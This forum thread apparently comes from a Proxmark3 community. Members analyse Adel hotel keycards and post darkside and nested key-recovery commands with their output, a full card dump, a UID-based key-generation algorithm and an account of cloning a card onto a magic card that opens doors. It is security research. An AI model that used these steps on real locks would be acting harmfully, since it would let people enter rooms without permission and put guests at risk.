Proxmark3 community

Research, development and trades concerning the powerful Proxmark3 device.

Remember; sharing is caring. Bring something back to the community.


"Learn the tools of the trade the hard way." +Fravia

You are not logged in.

Announcement

Time changes and with it the technology
Proxmark3 @ discord

Users of this forum, please be aware that information stored on this site is not private.

#1 2017-12-08 11:38:02

iceman
Administrator
Registered: 2013-04-25
Posts: 9,495
Website

Hotel system Adel - dump

The Adel card is a clone which always nacks.  Making darkside take a bit longer.  Not needed since its a default key, which would be picked up with checkkeys.

Uses a very strange SAK,  0x19

Many default keys,   the sector 1, 15  AB  ==  127567df7ba4     --> 12 UID A4 


pm3 --> hf 14a info
 UID : 75 67 DF 7B           
ATQA : 00 04          
 SAK : 19 [2]          
proprietary non iso14443-4 card found, RATS not supported          
Answers to magic commands: NO          
Prng detection: WEAK          

pm3 --> hf mf nack
.          
Always leak NACK detected         
pm3 --> hf mf mif
----------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average
Press pm3-button on the proxmark3 device to abort both proxmark3 and client.
----------------------------------------------------------------------------
.
Parity is all zero. Most likely this card sends NACK on every authentication.          
Attack will take a few seconds longer because we need two consecutive successful runs.          
.....
Found 72 candidate keys. Trying to verify with authentication...
          
Test authentication failed. Restarting darkside attack          
.
Parity is all zero. Most likely this card sends NACK on every authentication.          
Attack will take a few seconds longer because we need two consecutive successful runs.          
..
Found 13 candidate keys. Trying to verify with authentication...
          
Test authentication failed. Restarting darkside attack          
.
Parity is all zero. Most likely this card sends NACK on every authentication.          
Attack will take a few seconds longer because we need two consecutive successful runs.          
..
Found a candidate key. Trying to verify it with authentication...
          
Found valid key: a0a1a2a3a4a5
pm3 --> hf mf nested 1 0 a a0a1a2a3a4a5
Testing known keys. Sector count=16          
Time to check 18 known keys: 7 seconds
          
enter nested...          
UID: 7567df7b target block:  0 key type: B  -- Found key [d0d1d2d3d4d5]          
UID: 7567df7b target block:  4 key type: A  -- Found key [127567df7ba4]          
UID: 7567df7b target block:  4 key type: B          
UID: 7567df7b target block: 60 key type: A  -- Found key [127567df7ba4]          
UID: 7567df7b target block: 60 key type: B  -- Found key [127567df7ba4]          
UID: 7567df7b target block:  4 key type: B  -- Found key [127567df7ba4]          
Time in nested: 12 seconds
          
trying to read key B...          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  a0a1a2a3a4a5  | 1 |  d0d1d2d3d4d5  | 1 |          
|001|  127567df7ba4  | 1 |  127567df7ba4  | 1 |          
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|015|  127567df7ba4  | 1 |  127567df7ba4  | 1 |          
|---|----------------|---|----------------|---|     

Offline

#2 2017-12-08 11:42:57

iceman
Administrator
Registered: 2013-04-25
Posts: 9,495
Website

Re: Hotel system Adel - dump

7567df7bb619040069444c4b56328ba0
00006c510000000000000000000000aa
00000000000000000000000000006851
a0a1a2a3a4a5787788c1d0d1d2d3d4d5
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
127567df7ba408778fff127567df7ba4
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
100193415669898505557d9688594896
8888888888888885dddddddddd9d0000
00000000000000000000000000000000
127567df7ba408778fff127567df7ba4

Offline

#3 2017-12-08 12:43:53

iceman
Administrator
Registered: 2013-04-25
Posts: 9,495
Website

Re: Hotel system Adel - dump

simple keygen algo:

key[0] = uid[0] ^ uid[1] 
key[1-4] = uid[0-3]
key[5]  =  checksum ( key[0]^key[1]^key[2]^key[3]^key[4] )

Offline

#4 2018-07-19 15:49:04

henc
Contributor
Registered: 2017-05-13
Posts: 11

Re: Hotel system Adel - dump

Hey Iceman did these have sector 16 - 31 locked down as well? Think I have a couple samples from the same system as you, the XOR algo on mine matches yours. I have one sample that's been coded in the system with a biometrics application and one that should be straight out of the box from the supplier without additional coding from the hotel's desktop encoder. Both have S16 - 31 A/B locked and I don't think those sectors follow the S1/15 keys you cracked.

SAK 0x19 seemed strange to me as well (it's how I stumbled on this thread) - assumed this chip was Mifare Plus 2k 4 byte UID in SL1 but I expected SAK to be 0x18 then.

Offline

#5 2018-07-19 20:40:02

iceman
Administrator
Registered: 2013-04-25
Posts: 9,495
Website

Re: Hotel system Adel - dump

Dunno if  s16-31 matches. I didn't have access to a 4k card from Adel.  Collect and gather enough samples so you can do some analysing done.

Offline

#6 2019-07-19 21:02:19

hfmfsniff
Contributor
Registered: 2019-07-07
Posts: 19

Re: Hotel system Adel - dump

iceman wrote:

Dunno if  s16-31 matches. I didn't have access to a 4k card from Adel.  Collect and gather enough samples so you can do some analysing done.

I successfully cloned a ADEL card to a UID (Chinese magic gen1, 1k) card.

ADEL card just used a strange SAK=19 to confuse regular hobbyist. It is just a regular M1 S50 1k with SAK altered. There are not locked sector 16 - 31. And it doesn't require anything but sector 1 and 15 to open the door like most door access system does. (at least in my version)

To clone it, I managed to sourced a "perfect" UID card that loyally read SAK bytes in block 0 and response to reader with that SAK.

This card is quite rare since most UID/magic cards just respond SAK 08 for simplicity I guess? Just found 4 out of 60 cards....
(was 4 out of 33, and I thought as my vendor search expands there will be more "perfect" cards emerging,  but it doesn't turn out that way.)

Last edited by hfmfsniff (2019-07-19 21:06:36)

Offline

#7 2019-07-19 21:16:53

hfmfsniff
Contributor
Registered: 2019-07-07
Posts: 19

Re: Hotel system Adel - dump

iceman wrote:
sector 0:
blk1: 0000 6c51 0000 0000 0000 0000 0000 00aa
blk2: 0000 0000 0000 0000 0000 0000 0000 6851
....

Sector 0 of ADEL card is usually filled with (often with consecutive repetition) 6C51, 6B51, 6851, 6A51. Does that make any sense to you?

here is my sample.

blk1: 0007 6C51 0000 0000 0000 0000 0000 0600
blk2: 6B51 6B51 6B51 6B51 6B51 6B51 6851 6A51

This pattern is highly conservative across 3 cards that opens the same door. What is funny is that only the last "6A51" in blk2 is useful. It can be modified to the following but still can open the door

blk1: 0007 6C51 0000 0000 0000 0000 0000 0600
blk2: 0000 0000 0000 0000 0000 0000 0000 6A51

This pattern aligns with your pattern very well

Last edited by hfmfsniff (2019-07-19 21:20:12)

Offline

#8 2019-07-20 10:06:43

piwi
Contributor
Registered: 2013-06-04
Posts: 704

Re: Hotel system Adel - dump

Sector 0 blocks 1 and 2 most often contain the Mifare Application Directory (MAD). It shows which sectors are used by which application. You can lookup the application IDs on http://cardinfo.barkweb.com.au/index.ph … =19&sub=36. The MAD checksum will become invalid if you modify parts of it.

Offline

#9 2019-08-04 03:57:55

hfmfsniff
Contributor
Registered: 2019-07-07
Posts: 19

Re: Hotel system Adel - dump

piwi wrote:

Sector 0 blocks 1 and 2 most often contain the Mifare Application Directory (MAD). It shows which sectors are used by which application. You can look up the application IDs on http://cardinfo.barkweb.com.au/index.ph … =19&sub=36. The MAD checksum will become invalid if you modify parts of it.

Very useful information. However, I think ADEL doesn't check CRC bits validity (block1, second byte) at all. The cards still open the door after modification of AIDs.

Offline

Board footer

Powered by FluxBB